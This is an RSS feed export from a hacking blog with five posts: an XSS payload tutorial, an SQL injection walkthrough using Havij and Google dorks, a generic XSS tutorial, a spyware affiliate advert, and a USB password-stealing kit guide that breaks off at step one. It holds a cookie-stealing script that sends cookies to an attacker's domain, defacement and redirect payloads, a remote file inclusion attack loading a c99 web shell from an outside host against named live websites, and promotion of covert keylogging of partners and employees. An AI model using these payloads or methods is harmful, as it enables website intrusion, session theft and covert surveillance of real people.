<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hacking Truths &#187; Hardcore Hacking</title>
	<atom:link href="http://www.hungry-hackers.com/category/hardcore-hacking/feed" rel="self" type="application/rss+xml" />
	<link>http://www.hungry-hackers.com</link>
	<description>Hacking is fun, If you are a &#34;Hacker&#34;!</description>
	<lastBuildDate>Wed, 11 Jan 2012 19:43:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>XSS Injection Vulnerability in WordPress 3.2.1</title>
		<link>http://www.hungry-hackers.com/2011/08/xss-injection-vulnerability-in-wordpress-321.html</link>
		<comments>http://www.hungry-hackers.com/2011/08/xss-injection-vulnerability-in-wordpress-321.html#comments</comments>
		<pubDate>Mon, 15 Aug 2011 07:19:18 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[WordPress Hacks]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[Latest]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=2039</guid>
		<description><![CDATA[Bad news for just about every WordPress blogger out there. It has been found that the latest version 3.2.1 of WordPress is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.]]></description>
			<content:encoded><![CDATA[<p><strong>Update</strong>: It will work only if you are logged in. Sorry for the false alarm. My intention were to alert the bloggers so that they could safeguard their blogs. For more details <strong><a title="False Alarm" href="http://www.hungry-hackers.com/2011/08/false-alarm-xss-vulnerability-in-wordpress-321.html" target="_blank">Click Here</a></strong></p>
<p><img class="alignleft size-full wp-image-2040" title="wordpress-attack" src="http://www.hungry-hackers.com/wp-content/uploads/2011/08/wordpress-attack.jpg" alt="" width="290" height="191" />Bad news for just about every WordPress blogger out there. Thousands of WordPress 3.2.1 installations are at risk of being compromised. It has been found that the latest version 3.2.1 of WordPress, an extremely popular suite of tools for powering blogs, is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.</p>
<h3>How does it work?</h3>
<p>Inject one of the below codes into the comment field of the target. Or use your brain to make a more powerful injection</p>
<blockquote><p><strong>Popup &#8220;alert&#8221; Box</strong><br />
&lt;script&gt;alert(&#8216;hungry-hackers.com&#8217;)&lt;/script&gt;</p></blockquote>
<blockquote><p><strong>Redirect to www.hungry-hackers.com</strong><br />
&lt;script&gt;document.location=&#8221;http://hungry-hackers.com&#8221;&lt;/script&gt;</p></blockquote>
<blockquote><p><strong>Cookie Stealer (need a logging system in place)</strong><br />
&lt;script&gt;document.location=***8221;***91;url***93;http://your-domain/your***91;/url***93; stealer.php?cookie=***8221; + document.cookie;document.location=***8221;http://the-site-you-are-stealing-from.com&#8221;&lt;/script&gt;</p></blockquote>
<h3>Solution:</h3>
<p>Upgrade to the latest version when available, In the meantime disable comments or hold comments for moderation as I did <img src='http://www.hungry-hackers.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><strong><br />
</strong></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=2039&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/08/xss-injection-vulnerability-in-wordpress-321.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>SQL Injection Using Havij</title>
		<link>http://www.hungry-hackers.com/2011/02/sql-injection-using-havij.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/sql-injection-using-havij.html#comments</comments>
		<pubDate>Thu, 10 Feb 2011 03:42:40 +0000</pubDate>
		<dc:creator>Irfan Shakeel</dc:creator>
				<category><![CDATA[Hacking Forum]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server Hacking]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[google dorks]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Havij]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[vulnerablibity]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1807</guid>
		<description><![CDATA[SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-1808" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/sql_img.jpg" alt="" width="300" height="225" />SQL injection is an attack in which malicious code is inserted into  strings that are later passed to an instance of SQL Server for parsing  and execution. Any procedure that constructs SQL statements should be  reviewed for injection vulnerabilities because SQL Server will execute  all syntactically valid queries that it receives. Even parameterized  data can be manipulated by a skilled and determined attacker.</p>
<p style="text-align: justify;"><span id="more-1807"></span>SQL Injection can be done by manually injection or via automatic tools. Automatic tools are easy to use and do not require much technical knowledge.</p>
<p style="text-align: justify;">In this tutorial we will discuss Havij. Havij is an automated SQL Injection tool that helps  penetration testers to find and exploit SQL Injection vulnerabilities on  a web page.</p>
<ul style="text-align: justify;">
<li>You can download havij from <a href="http://www.itsecteam.com/en/projects/project1.htm">here</a>.</li>
<li>We will use google dorks to find the vulnerable websites, there is a big list of google dorks  which I will post in my future articles but at this time we will only use the following:</li>
</ul>
<p style="text-align: justify;"><em> </em></p>
<blockquote style="text-align: justify;"><p><em>inurl:index.php?id=</em></p>
<p><em>inurl:trainers.php?id=</em></p>
<p><em>inurl:buy.php?category=</em></p>
<p style="text-align: justify;"><em>inurl:article.php?ID=</em></p>
</blockquote>
<p style="text-align: justify;"><em> </em></p>
<ul style="text-align: justify;">
<li>Just search google using one of the dork and you will see a lot of vulnerable websites.</li>
<li>Open any one of the website than put <em> &#8216;</em> after the link look:</li>
</ul>
<ul style="text-align: justify;">
<li>If you get the following SQL error, that means the website is vulnerable to SQL-injection attack.
<p style="text-align: center;"><img class="aligncenter size-full wp-image-1810" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/21.jpg" alt="" width="515" height="437" /></p>
</li>
<li>Now open Havij and paste the link without &#8216;
<p style="text-align: center;"><img class="size-medium wp-image-1813  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/1-273x300.jpg" alt="" width="359" height="394" /></p>
<p style="text-align: center;"><img class="size-medium wp-image-1816  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto2-274x300.jpg" alt="" width="364" height="399" /></p>
</li>
<li>Now we have to find the columns of the database.
<p style="text-align: center;"><img class="size-medium wp-image-1815  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto3-274x300.jpg" alt="" width="366" height="399" /></p>
<p style="text-align: center;"><img class="size-medium wp-image-1819  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto4-275x300.jpg" alt="" width="372" height="405" /></p>
</li>
<li>After this you will be able to find the admin id or password but remember normally web server uses MD5 encryption technique, you have to decrypt this password use havij option MD5 or you may read our tutorial on <a title="Cracking MD5" href="http://www.hungry-hackers.com/2008/06/cracking-md5.html" target="_blank">Cracking MD5</a>.</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto5.jpg"><img class="size-medium wp-image-1818  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto5-274x300.jpg" alt="" width="359" height="392" /></a></p>
<ul style="text-align: justify;">
<li>After decrypting the password, you have to find the admin login page of the website. To do that use Havij options.</li>
<li>Now you may login as the admin user and control the website as you want.</li>
<li>H@ppy H@cking</li>
</ul>
<p><strong>Video Tutorial</strong></p>
<p style="text-align: justify;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="350" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="play" value="false" /><param name="quality" value="high" /><param name="scale" value="showall" /><param name="src" value="http://www.youtube.com/v/Qvhdz8yE_po" /><embed type="application/x-shockwave-flash" width="425" height="350" src="http://www.youtube.com/v/Qvhdz8yE_po" scale="showall" quality="high" play="false"></embed></object></p>
<p style="text-align: justify;"><strong>About The Author</strong></p>
<p style="text-align: justify;"><strong>Irfan Shakeel </strong>is an  ethical hacker/penetration tester and he have found many bugs on the  famous web server. He is the founder of Ethical <a href="http://www.ehacking.net/" target="_blank">Hacking Blog.</a></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1807&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/sql-injection-using-havij.html/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>XSS Cross Site Scripting Attack</title>
		<link>http://www.hungry-hackers.com/2010/09/xss-cross-site-scripting-attack.html</link>
		<comments>http://www.hungry-hackers.com/2010/09/xss-cross-site-scripting-attack.html#comments</comments>
		<pubDate>Wed, 22 Sep 2010 15:18:41 +0000</pubDate>
		<dc:creator>rafay</dc:creator>
				<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[Cross Site Scripting]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Tutorials]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1662</guid>
		<description><![CDATA[Previously I wrote about Remote File Inclusion vulnerability, However Ashik asked me to make another guest post on any topic related to Hacking as he was really busy, so I though to demonstrate another type of website hacking attack called Cross Site Scripting attack, a.k.a. XSS these vulnerabilities occur due to weak coding of the web applications. Once the hacker finds this vulnerability he/she injects malicious codes(Usually in web forms) to steal session cookies and later the hacker uses those cookies to gain access to sensitive page content.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.jpg"><img class="alignleft size-full wp-image-1674" title="xss" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.jpg" alt="" width="176" height="134" /></a>Previously I wrote about <a title=" Hack a Website Using Remote File Inclusion" href="http://www.hungry-hackers.com/2010/08/hack-a-website-using-remote-file-inclusion.html" target="_blank">Remote File Inclusion vulnerability</a>, However  Ashik asked me to make another guest post on any topic related to  Hacking as he was really busy, so I though to demonstrate another type  of website hacking attack called Cross Site Scripting attack,a.k.a. XSS. XSS  vulnerabilities occur due to weak coding of the web applications. Once  the hacker finds this vulnerability he/she injects malicious  codes(Usually in web forms) to steal session cookies and later the  hacker uses those cookies to gain access to sensitive page content.</p>
<p>Xss Cross Site Scripting may be classified in two types:</p>
<p><strong>1.</strong>Persistent XSS</p>
<p><strong>2.</strong>Non Persistent XSS</p>
<p>In order to demonstrate a XSS attack I will take an example of a website:</p>
<blockquote><p><a href="http://www.redwrappings.co.in/">http://www.redwrappings.co.in</a></p></blockquote>
<p><strong>Checking the venerability </strong></p>
<p>The simplest way to check the vulnerability is to enter the following code in the any web form present on the website</p>
<blockquote><p><strong>&lt;script&gt;alert(&#8220;XSS&#8221;)&lt;/script&gt;</strong></p></blockquote>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss.bmp"><img class="size-full wp-image-1666 aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss.bmp" alt="xss cross site scripting" /></a></p>
<p>Once the attacker inserts the code A dialog box like the below one will appear:</p>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.bmp"><img class="size-full wp-image-1667 aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.bmp" alt="" /></a></p>
<p><strong>Defacement</strong></p>
<p style="text-align: justify;">Now the attacker has found that the website is velnerable to an xss attack the attacker can do lots of damages to the website, The most common thing which the attacker will do is place his defacement image on that page showing that the website is hacked, For this purpose he will insert a code similar to the below one:</p>
<blockquote><p><strong>&lt;html&gt;&lt;body&gt;&lt;IMG SRC=&#8221;http://site.com/yourDefaceIMAGE.png&#8221;&gt;&lt;/body&gt;&lt;/html&gt;</strong></p></blockquote>
<p>Where <strong>http://site.com/yourDefaceIMAGE.png </strong>is the defacement image</p>
<p><strong>Inserting Flash Videos</strong></p>
<p>The attacker can also insert flash videos by entering the following code in any web form present on the website</p>
<p><strong>Redirection</strong></p>
<p style="text-align: justify;">The attacker can also redirect the page to any particular page , In case if the hacker has managed to find XSS venerability in the a website like paypal.com or alertpay.com he can redirect that page to a Phisher Site(Fake login page) where the victim will loose his password, To redirect a an xssed page to another page the attacker will insert a code similar to the below one:</p>
<blockquote><p><strong>&lt;script&gt;window.open( &#8220;http://www.google.com/&#8221; )&lt;/script&gt;</strong></p></blockquote>
<p style="text-align: justify;"><strong>Stealing Cookies</strong></p>
<p style="text-align: justify;">Most of the attackers after finding a website venerable to xss will probably steal victims cookies to gain access to their account or private data this method is called Session hijacking, which is a detailed topic and I will be explaining in the later articles <img src='http://www.hungry-hackers.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p style="text-align: justify;">Hope you have learned some XSS ,Feel free to ask if you have any problem regarding the above information</p>
<p style="text-align: justify;"><strong>About the Author</strong></p>
<p style="text-align: justify;">This is a guest post by Rafay baloch. Rafay Baloch is a the founder of <a title="Rafay Hacking Articles" href="http://rafayhackingarticles.blogspot.com/" target="_blank">Rafay Hacking Articles</a> and the writer of the book <a href="http://www.hungry-hackers.com/2010/08/a-beginners-guide-to-ethical-hacking.html"><strong>A Beginners guide To Ethical Hacking</strong></a><a href="../2010/08/www.hacking-book.com" target="_blank"></a></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1662&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2010/09/xss-cross-site-scripting-attack.html/feed</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>How to Spy on a Remote PC</title>
		<link>http://www.hungry-hackers.com/2010/09/how-to-spy-on-a-remote-pc.html</link>
		<comments>http://www.hungry-hackers.com/2010/09/how-to-spy-on-a-remote-pc.html#comments</comments>
		<pubDate>Wed, 08 Sep 2010 14:19:56 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Hacking Computer]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Internet Hacking]]></category>
		<category><![CDATA[Keyloggers]]></category>
		<category><![CDATA[Password Recovery]]></category>
		<category><![CDATA[Review]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Download]]></category>
		<category><![CDATA[Email]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Spy]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1650</guid>
		<description><![CDATA[I received a lot of email from the users who wanted to spy on their Girl friends, Boy friends, Spouse, Children or Employee. The software I am going to review today is a solution to all these problems. Using this spy software you will be able to know what your partners are doing. It will allow you to see exactly what your teenager is doing online remotely. It will also allow you to monitor any employee who uses the company computer(s) remotely.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">I received a lot of email from the users who wanted to spy on their Girl friends, Boy friends, Spouse, Children or Employee. The software I am going to review today is a solution to all these problems. Using this spy software you will be able to know what your partners are doing. It will allow you to see exactly what your teenager  is doing online remotely. It will also allow you to monitor any  employee who uses the company computer(s) remotely.</p>
<h2 style="text-align: justify;">Sniper Spy</h2>
<p></p>
<p style="text-align: center;"><a title="Sniper Spy" href="http://www.plimus.com/jsp/redirect.jsp?contractId=2160696&amp;referrer=hungryhacker" target="_blank"><img class="size-full wp-image-1651  aligncenter" title="sniperspy" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/sniperspy.jpg" alt="" width="444" height="157" /></a></p>
<p style="text-align: justify;"><strong><a title="Sniper Spy" href="http://www.plimus.com/jsp/redirect.jsp?contractId=2160696&amp;referrer=hungryhacker" target="_blank">SniperSpy</a></strong> is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature. Once installed on the remote PC(s) you wish, you only need to login to  your own personal SniperSpy account to view activity logs of the remote  PC’s!  This means that you can view logs of the remote PC’s from  anywhere in the world as long as you have internet access!</p>
<h3 style="text-align: justify;"><strong>Features</strong></h3>
<ul style="text-align: justify;">
<li>
<div>
<div><strong>Remotely Deployable</strong> : It means you don&#8217;t need to have access of the system on which you need to install it.</div>
</div>
</li>
<li>
<div>
<div><strong>Invisibility Stealth Mode</strong> : It can work in invisible mode without the knowledge of the victim.</div>
</div>
</li>
<li>
<div>
<div><strong>Record Login Credentials</strong> : It can Records any Password for any Email account or login details of the victim on any website. This can give you access to the victims email or any other web account.<a href="http://www.hungry-hackers.com/wp-content/uploads/2010/09/SniperSpy_4.jpg"></a></div>
<p style="text-align: center;"><a title="Sniper Spy" href="http://www.plimus.com/jsp/redirect.jsp?contractId=2160696&amp;referrer=hungryhacker" target="_blank"><img class="aligncenter size-full wp-image-1653" title="SniperSpy_4" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/SniperSpy_4.jpg" alt="" width="400" height="255" /></a></p>
</div>
</li>
<li><strong>Real Time Screen Viewer : </strong>You can see all the activities that is taking place on the victim&#8217;s PC.</li>
<li><strong>Remote Reboot/Shutdown</strong> : You can also remotely reboot or shutdown the PC or choose to logoff the current Windows user.</li>
<li><strong>Bypass Any Firewal</strong>l : The best part of this software is that it can completely undetectable by any Firewall available till now.</li>
<li><strong>Actual Screenshots</strong> : Captures a full-size jpg picture of the active window however often you wish.</li>
<li><strong>Websites Visited</strong> : Records all website URLs visited in Internet Explorer and Firefox with page title.</li>
<li><strong>Keystrokes in Most Languages</strong> : Every keystroke typed into ANY window is logged, including passwords typed.</li>
<li><strong>PC Location Mapping</strong> : Logs the IP at each upload to show you physical locations of the PC on a map.</li>
<li><strong>Full Chat Conversations</strong> : Records BOTH sides of chats / IMs in Google Talk, Yahoo IM, Windows Live and more.<a href="http://www.hungry-hackers.com/wp-content/uploads/2010/09/sniperspy_3.jpg"></a></li>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-1652" title="sniperspy_3" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/sniperspy_3.jpg" alt="" width="320" height="168" /></p>
<li><strong>Applications Executed</strong> : Records every application executed by the user including full path and username.</li>
<li><strong>Application Session Durations</strong> : Shows you how long each application was used including start time and stop time.</li>
<li><strong>Automatic User File Uploads</strong> : Uploads an *actual copy* of every document, picture or desktop file changed.</li>
<li><strong>File / Folder Changes</strong> : Each time a file or folder changes, the software records the action and the full path.</li>
</ul>
<h3>Download</h3>
<p><strong><a title="Buy Now" href="https://www.plimus.com/jsp/buynow.jsp?contractId=2160696&amp;referrer=hungryhacker" target="_blank">Click Here</a></strong> to buy this Amazing Software Right Now.</p>
<p><strong><a title="Official Website" href="http://www.plimus.com/jsp/redirect.jsp?contractId=2160696&amp;referrer=hungryhacker" target="_blank">Click Here</a></strong> to go to the Official Website of this Software.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1650&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2010/09/how-to-spy-on-a-remote-pc.html/feed</wfw:commentRss>
		<slash:comments>20</slash:comments>
		</item>
		<item>
		<title>Hack a Website Using Remote File Inclusion</title>
		<link>http://www.hungry-hackers.com/2010/08/hack-a-website-using-remote-file-inclusion.html</link>
		<comments>http://www.hungry-hackers.com/2010/08/hack-a-website-using-remote-file-inclusion.html#comments</comments>
		<pubDate>Mon, 23 Aug 2010 08:00:53 +0000</pubDate>
		<dc:creator>rafay</dc:creator>
				<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Server Hacking]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[remote file]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[Shell]]></category>
		<category><![CDATA[vulerability]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1606</guid>
		<description><![CDATA[Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify">Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.</p>
<p style="text-align: center"><a href="http://www.hungry-hackers.com/wp-content/uploads/2010/08/Server-Hacking.jpg"><img class="size-full wp-image-1613  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2010/08/Server-Hacking.jpg" alt="" width="400" height="267" /></a></p>
<p style="text-align: justify"><strong>Searching the Vulnerability </strong></p>
<p style="text-align: justify">Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one</p>
<blockquote><p><em>www.Targetsite.com/index.php?page=Anything</em></p></blockquote>
<p style="text-align: justify">To find the vulnerability the hacker will most commonly  use the following Google Dork</p>
<blockquote><p><em>&#8220;inurl:index.php?page=&#8221;</em></p></blockquote>
<p style="text-align: justify"><strong><span style="font-weight: normal">This will show all the pages which has &#8220;</span>index.php?page=<span style="font-weight: normal">&#8221; in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command</span></strong></p>
<blockquote><p><em>www.targetsite.com/index.php?page=www.google.com</em></p></blockquote>
<p style="text-align: justify">Lets say that the target website is <em>http://www.cbspk.com</em></p>
<p style="text-align: justify">So the hacker url will become</p>
<blockquote><p><em>http://www.cbspk.com/v2/index.php?page=http://www.google.com</em></p></blockquote>
<p style="text-align: justify">If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack</p>
<p style="text-align: center"><a href="http://www.hungry-hackers.com/wp-content/uploads/2010/08/Remote-file.bmp"><img class="size-full wp-image-1607   aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2010/08/Remote-file.bmp" alt="" width="550" height="341" /></a></p>
<p style="text-align: justify"><strong><span style="font-weight: normal">Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:</span></strong></p>
<blockquote><p><em>http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829</em></p></blockquote>
<p style="text-align: justify"><strong><span style="font-weight: normal">The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc. </span></strong></p>
<p style="text-align: justify"><strong><span style="font-weight: normal">Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is</span></strong></p>
<blockquote><p><em>http://h1.ripway.com/rafaybaloch/c99.txt</em></p></blockquote>
<p style="text-align: justify"><strong><span style="font-weight: normal"> Now here is how a hacker would execute the following command to gain access</span></strong></p>
<blockquote><p><em><span style="font-weight: normal">http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?</span></em></p></blockquote>
<p style="text-align: justify"><strong><span style="font-weight: normal">Remember to add &#8220;?&#8221; at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it</span></strong></p>
<p style="text-align: justify"><strong>About the Author</strong></p>
<p style="text-align: justify">This is a guest post by Rafay baloch. Rafay Baloch is a the founder of <a title="Rafay Hacking Articles" href="http://rafayhackingarticles.blogspot.com/" target="_blank">Rafay Hacking Articles</a> and the writer of the book <a href="www.hacking-book.com" target="_blank">A Beginners Guide To Ethical Hacking</a></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1606&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2010/08/hack-a-website-using-remote-file-inclusion.html/feed</wfw:commentRss>
		<slash:comments>39</slash:comments>
		</item>
		<item>
		<title>How to Hack passwords using a USB</title>
		<link>http://www.hungry-hackers.com/2009/12/how-to-hack-passwords-using-a-usb.html</link>
		<comments>http://www.hungry-hackers.com/2009/12/how-to-hack-passwords-using-a-usb.html#comments</comments>
		<pubDate>Mon, 14 Dec 2009 06:48:58 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Password Recovery]]></category>
		<category><![CDATA[Windows Hacking]]></category>
		<category><![CDATA[Freeware]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Passwords]]></category>
		<category><![CDATA[Rootkits]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[USB]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1173</guid>
		<description><![CDATA[Hello Friends,
<p style="text-align: justify;">Have you ever thought that a Simple USB Drive can be used as a Destructive Tool for Hacking Passwords? Today I will show you how to hack Passwords using an USB Pen Drive.</p>]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2009/12/bios-passhack.gif"><img class="alignleft size-full wp-image-1174" style="margin-right:10px;" title="bios-passhack" src="http://www.hungry-hackers.com/wp-content/uploads/2009/12/bios-passhack.gif" alt="bios-passhack" width="200" height="280" /></a>Hello Friends,</p>
<p style="text-align: justify;">Have you ever thought that a Simple USB Drive can be used as a Destructive Tool for Hacking Passwords? Today I will show you how to hack Passwords using an USB Pen Drive.</p>
<p style="text-align: justify;">As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places.</p>
<p style="text-align: justify;">Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.</p>
<p style="text-align: justify;"><strong><a title="Messenger Password View" rel="nofollow" href="http://www.easy-share.com/1903578301/mspass.zip" target="_blank">MessenPass</a>: </strong>Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.</p>
<p style="text-align: justify;"><strong><a title="Mail Password View" rel="nofollow" href="http://www.easy-share.com/1903578300/mailpv.zip" target="_blank">Mail PassView</a>: </strong>Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.<br />
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
</p>
<p style="text-align: justify;"><strong><a title="IE Password View" rel="nofollow" href="http://www.easy-share.com/1903578289/iepv.zip" target="_blank">IE Passview</a>: </strong>IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 &#8211; v6.0</p>
<p style="text-align: justify;"><strong><a title="Protected Storage PassView" rel="nofollow" href="http://www.easy-share.com/1903578307/pspv.zip" target="_blank">Protected Storage PassView</a>: </strong>Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…</p>
<p style="text-align: justify;"><strong><a title="Password Fox" rel="nofollow" href="http://www.easy-share.com/1903578302/passwordfox.zip" target="_blank">PasswordFox</a>: </strong>PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.</p>
<p style="text-align: justify;">Here is a step by step procedure to create the password hacking toolkit.</p>
<p style="text-align: justify;"><em><strong>NOTE:</strong></em> You must temporarily disable your Anti-Virus before following these steps.</p>
<p style="text-align: justify;"><strong>1.</strong> <strong>Download </strong>all the 5 tools, extract them and copy only the <strong>executables(.exe files)</strong> into your USB Pendrive.</p>
